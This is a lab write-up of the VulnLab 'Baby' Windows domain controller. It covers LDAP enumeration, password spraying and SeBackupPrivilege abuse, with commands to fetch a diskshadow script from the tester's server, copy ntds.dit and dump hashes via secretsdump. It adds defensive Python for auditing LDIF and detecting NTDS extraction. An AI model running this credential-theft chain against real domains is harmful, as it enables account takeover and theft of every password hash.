Penetration Testing - VulnLab - Baby (easy)
Enrique A.
CRTP | PNPT | ARTA | Security Engineer with 9+ years of experience in network penetration testing, AD testing, Linux server testing and web application security testing.
I've recently joined VulnLab and have been diving into their collection of machines to hone my penetration testing and ethical hacking skills. One of the first challenges I took on last night was Baby (I want to start testing the waters with the easy ones :P), which despite its name, proved to be a great way to learn and stay engaged. In this post, I'll walk you through the steps I followed to successfully exploit Baby.
1. Initial Reconnaissance with Nmap
Nmap scan report for 10.10.99.111
Host is up (0.047s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-05-23 14:30:29Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2024-05-22T14:19:38
|_Not valid after: 2024-11-21T14:19:38
|_ssl-date: 2024-05-23T14:31:14+00:00; +1s from scanner time.
| rdp-ntlm-info:
| Target_Name: BABY
| NetBIOS_Domain_Name: BABY
| NetBIOS_Computer_Name: BABYDC
| DNS_Domain_Name: baby.vl
| DNS_Computer_Name: BabyDC.baby.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-05-23T14:30:35+00:00
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-05-23T14:30:35
|_ start_date: N/A
|_clock-skew: mean: 1s, deviation: 0s, median: 0s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.59 seconds
From the Nmap results we now have one piece of the puzzle: the domain name, baby.vl. After trying some standard SMB enumeration commands (such as smbclient -L to list the available shares) I came up empty-handed, so I pivoted to other options. The initial scan had already shown LDAP active on port 389, which made me wonder whether the directory service itself could be a source of information.
2. LDAP Enumeration
Using ldapsearch, I was able to dump user information from LDAP.
ldapsearch is a command-line tool that queries an LDAP (Lightweight Directory Access Protocol) directory; it searches for and retrieves the entries stored in the directory.
I ran the command:
ldapsearch -x -H ldap://10.10.92.126:389 -b "DC=baby,DC=vl"
What the command does:
This command performs an LDAP search against the server at 10.10.99.111 on port 389, starting from the base DN DC=baby,DC=vl. The -x flag selects simple authentication (with no bind DN supplied this is an anonymous bind) and -H gives the LDAP URL to connect to. Since no search filter is provided, ldapsearch uses the default filter (objectClass=*) and returns every entry under the base DN that the bound identity is allowed to read.
The results
Checking the results, it was possible to extract many users by searching for sAMAccountName, and also from memberOf. Even more interesting, a password was showing up in one of the descriptions:
I attempted to log into the machine with teresa.bell as the username, but it did not work.
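The finding in this section is a credential stored in a user's description attribute, and the same dump also yields the account list and the group memberships. Below is an added example (not from the original post, and not part of ldapsearch itself) of how a defender can audit an ldapsearch LDIF export for exactly that: it parses the LDIF format, including folded continuation lines and base64 values, lists each user's groups from memberOf, and flags description values that look like they contain a password. The LDIF here is constructed sample data with invented names and DNs; in practice you would point it at the saved output of the ldapsearch command above.

```python
"""Audit an LDIF dump (the format ldapsearch prints) for user objects whose
description attribute contains credential-like text, and list each user's
group memberships from memberOf.

Added example for this post, not code from the original walkthrough. The LDIF
below is constructed sample data; the names and DNs are invented."""
import base64
import re

# Constructed sample: one harmless user, one with a password on a folded
# description line, one with a base64-encoded ("::") description, and a group.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <DC=example,DC=local> with scope subtree
# filter: (objectclass=*)

dn: CN=Alice Example,CN=Users,DC=example,DC=local
objectClass: user
sAMAccountName: alice.example
memberOf: CN=it,CN=Users,DC=example,DC=local
memberOf: CN=Remote Management Users,CN=Builtin,DC=example,DC=local
description: Helpdesk contact for the IT team

dn: CN=Bob Example,CN=Users,DC=example,DC=local
objectClass: user
sAMAccountName: bob.example
memberOf: CN=dev,CN=Users,DC=example,DC=local
description: Set initial password to Start123! on first lo
 gin

dn: CN=Carol Example,CN=Users,DC=example,DC=local
objectClass: user
sAMAccountName: carol.example
description:: VGVtcCBwYXNzd29yZDogV2ludGVyMjAyNCE=

dn: CN=Printers,CN=Users,DC=example,DC=local
objectClass: group
sAMAccountName: printers
description: Print operators
"""

CRED_HINT = re.compile(r"\b(pass(word|wd)?|pwd|credential)s?\b", re.I)


def parse_ldif(text):
    """Return a list of entries, each a dict of lower-cased attribute -> [values].

    Handles comment lines, folded continuation lines (leading space) and
    base64 values (attr:: ...), which ldapsearch emits for non-ASCII data."""
    unfolded = []
    for raw in text.splitlines():
        if raw.startswith(" ") and unfolded:
            unfolded[-1] += raw[1:]        # continuation of the previous line
        else:
            unfolded.append(raw)

    entries, current = [], None
    for line in unfolded + [""]:           # trailing "" flushes the last entry
        if line == "":
            if current:
                entries.append(current)
            current = None
            continue
        if line.startswith("#"):
            continue
        attr, _, rest = line.partition(":")
        if rest.startswith(":"):
            value = base64.b64decode(rest[1:].strip()).decode("utf-8", "replace")
        else:
            value = rest.strip()
        if current is None:
            current = {}
        current.setdefault(attr.lower(), []).append(value)
    return entries


def looks_like_credential(text):
    """Heuristic: mentions a password-ish word, or contains a token that looks
    like a password (8+ chars mixing upper, lower, digit and punctuation)."""
    if CRED_HINT.search(text):
        return True
    for token in text.split():
        if (len(token) >= 8
                and re.search(r"[a-z]", token) and re.search(r"[A-Z]", token)
                and re.search(r"\d", token) and re.search(r"[^A-Za-z0-9]", token)):
            return True
    return False


def extract_users(entries):
    """One record per user object: sAMAccountName, group CNs from memberOf,
    and every description value that looks like it holds a credential."""
    records = []
    for entry in entries:
        classes = {v.lower() for v in entry.get("objectclass", [])}
        if "user" not in classes:
            continue
        groups = [m.split(",")[0][3:] for m in entry.get("memberof", [])]  # strip "CN="
        flagged = [d for d in entry.get("description", []) if looks_like_credential(d)]
        records.append({"sam": entry.get("samaccountname", [""])[0],
                        "groups": groups, "flagged": flagged})
    return records


if __name__ == "__main__":
    for rec in extract_users(parse_ldif(SAMPLE_LDIF)):
        status = "CREDENTIAL IN DESCRIPTION" if rec["flagged"] else "ok"
        print(f"{rec['sam']:<16} groups={rec['groups']} {status}")
```

The base64 branch matters because AD descriptions with non-ASCII characters are printed as `description::` and would otherwise be skipped by a plain grep for "password"; the folded-line handling matters for the same reason, since a long description can split the password across two physical lines.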
3. Password Spraying
We have more parts of the puzzle now:
So we can now start password spraying that password against the list of users we have, using the following tool:
CrackMapExec (https://github.com/byt3bl33d3r/CrackMapExec)
The results show that the user Caroline.Robinson is currently using the password BabyStart123!, but it needs to be changed. So we will use another tool, smbpasswd, to change the user's password.
└─$ smbpasswd -U Caroline.Robinson -r 10.10.99.111
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user Caroline.Robinson
I changed it to Password123!!!
Now we can log into the server as Caroline.Robinson.
4. Privilege Escalation
Once logged into the server with Evil-WinRM, I checked my privileges:
I noted that SeBackupPrivilege is enabled.
I found some good articles explaining how to abuse this privilege:
In this walkthrough I will use the technique shown in the first article.
Basically, it explains that to exploit SeBackupPrivilege on a Domain Controller you can use the diskshadow utility to create a Volume Shadow Copy of the C: drive: write a DSH script with the necessary commands, upload it to the target and run it. This allows copying the ntds.dit file and the SYSTEM hive using robocopy. Download these files to your local machine and use the secretsdump.py script from the Impacket suite to extract the password hashes, which let us log into the machine with administrator credentials.
As per the first article, we need to create a file with the following content:
set context persistent nowriters
add volume c: alias punk
create
expose %punk% z:
I saved this file as evil.dsh on my Linux box and ran the following command, as recommended in the article (diskshadow expects Windows CRLF line endings):
unix2dos evil.dsh
I also started an HTTP server on my Linux box in order to share this file:
python -m http.server 9090
From the victim machine I ran the following command (in the PowerShell session, where wget is an alias for Invoke-WebRequest; the server is plain HTTP):
wget http://10.8.x.x:9090/evil.dsh -OutFile evil.dsh
Once the file is saved on the victim server, we can proceed with the attack:
1) Creating the shadow copy:
diskshadow /s evil.dsh
2) Once the shadow copy is ready, we can extract the ntds.dit file with robocopy (the /b switch selects backup mode, which is exactly what SeBackupPrivilege permits):
robocopy /b Z:\windows\ntds C:\temp ntds.dit
3) We also need to get the SYSTEM hive.
4) With ntds.dit and the SYSTEM hive we can now use impacket-secretsdump to dump all the hashes on that box.
Now we can log into the server as the administrator user with Evil-WinRM and the newly obtained hash.
Another method
Another way to extract the ntds.dit file is to create a shadow copy with vssadmin and then copy the file out of it manually.
Once the shadow copy is created, list the shadow copies and then copy the ntds.dit file out manually.
The remaining steps are the same: transfer the files off the server and run impacket-secretsdump against them.
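Both methods above (diskshadow driven by a script, and vssadmin) create a shadow copy and then copy ntds.dit and the SYSTEM hive out of it, and that sequence on a domain controller is what a defender should correlate on. The added example below (not from the original post, the referenced articles or any vendor product) does this over constructed process-creation log lines (Sysmon event 1 or Security 4688 style, flattened to one line each) with invented hosts, users and paths: it classifies each command line into a stage and alerts only when a shadow-copy creation is followed within a window by a copy that touches NTDS, so that a backup job which merely creates shadow copies does not trip it.

```python
"""Correlate process-creation events (Sysmon event 1 / Security 4688 style)
into the 'shadow copy, then copy NTDS.dit, then save SYSTEM hive' sequence
that a SeBackupPrivilege holder uses on a domain controller, and distinguish
it from an ordinary backup job that also creates shadow copies.

Added example for this post, not the author's code or any vendor rule. The
events below are constructed, flattened log lines; hosts, users and paths
are invented."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_EVENTS = r"""
2024-05-23T15:02:11Z Host=DC01 User=LAB\jdoe Image=C:\Windows\System32\diskshadow.exe CommandLine="diskshadow /s C:\temp\script.dsh"
2024-05-23T15:02:40Z Host=DC01 User=LAB\jdoe Image=C:\Windows\System32\Robocopy.exe CommandLine="robocopy /b Z:\windows\ntds C:\temp ntds.dit"
2024-05-23T15:03:05Z Host=DC01 User=LAB\jdoe Image=C:\Windows\System32\reg.exe CommandLine="reg save hklm\system C:\temp\system"
2024-05-23T15:10:00Z Host=FS01 User=LAB\backupsvc Image=C:\Windows\System32\vssadmin.exe CommandLine="vssadmin create shadow /for=C:"
2024-05-23T15:20:00Z Host=FS01 User=LAB\backupsvc Image=C:\Windows\System32\Robocopy.exe CommandLine="robocopy /b C:\Data D:\Backup\Data /MIR"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) Host=(?P<host>\S+) User=(?P<user>\S+) Image=(?P<image>\S+) '
    r'CommandLine="(?P<cmd>[^"]*)"$')

# Each stage of the technique described in the post, as a command-line pattern.
STAGES = {
    "shadow": re.compile(r"\b(diskshadow(\.exe)?\s+/s\b|vssadmin(\.exe)?\s+create\s+shadow\b)", re.I),
    "ntds":   re.compile(r"\b(robocopy|xcopy|copy|esentutl)(\.exe)?\b.*\bntds\b", re.I),
    "hive":   re.compile(r"\breg(\.exe)?\s+save\s+hklm\\system\b", re.I),
}


def parse_events(text):
    """Turn the flattened lines into dicts; non-matching lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append({"ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
                           "host": m["host"], "user": m["user"],
                           "image": m["image"], "cmd": m["cmd"]})
    return events


def classify(cmd):
    """Return the stage name a command line belongs to, or None."""
    for name, pattern in STAGES.items():
        if pattern.search(cmd):
            return name
    return None


def detect_ntds_extraction(events, window_minutes=30):
    """Alert when a shadow-copy creation on a host is followed, within the
    window, by a copy that touches NTDS. A shadow copy on its own (backup
    software) or robocopy on its own does not alert."""
    by_host = defaultdict(list)
    for ev in events:
        stage = classify(ev["cmd"])
        if stage:
            by_host[ev["host"]].append((ev, stage))

    alerts = []
    window = timedelta(minutes=window_minutes)
    for host, staged in by_host.items():
        staged.sort(key=lambda pair: pair[0]["ts"])
        for i, (ev, stage) in enumerate(staged):
            if stage != "shadow":
                continue
            following = [(e, s) for e, s in staged[i + 1:] if e["ts"] - ev["ts"] <= window]
            stages = {stage} | {s for _, s in following}
            if "ntds" in stages:
                alerts.append({"host": host, "user": ev["user"], "first": ev["ts"],
                               "stages": sorted(stages),
                               "commands": [ev["cmd"]] + [e["cmd"] for e, _ in following]})
    return alerts


if __name__ == "__main__":
    for a in detect_ntds_extraction(parse_events(SAMPLE_EVENTS)):
        print(f"[{a['host']}] {a['user']} at {a['first']:%H:%M:%S}: stages {a['stages']}")
        for c in a["commands"]:
            print("   ", c)
```

On a real estate the cheaper control is upstream of this rule: the finding in this box is an ordinary user holding SeBackupPrivilege on a domain controller through Backup Operators-style group membership, and auditing who sits in those groups (the memberOf values from the LDAP section) removes the opportunity before any of these commands can run.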
Conclusion
Joining VulnLab has been an excellent decision for advancing my penetration testing and ethical hacking skills. Tackling the "Baby" machine was a perfect start, offering valuable insights and reinforcing essential techniques. From initial reconnaissance with Nmap to exploiting LDAP and leveraging SeBackupPrivilege for privilege escalation, each step was a learning experience. The journey underscored the importance of persistence, adaptability, and thorough exploration of potential attack vectors. I look forward to diving into more challenges and sharing my experiences. Happy hacking!
Information Security Professional | Safeguarding Assets, Mitigating Risks
9 months ago: Thanks for sharing! Periodically reading penetration test walkthroughs like this is a relatively quick way to understand the real level of effort and resources attackers use to achieve specific objectives. Defenders who stay informed at this level of detail can better prioritize their resources to reduce security risks.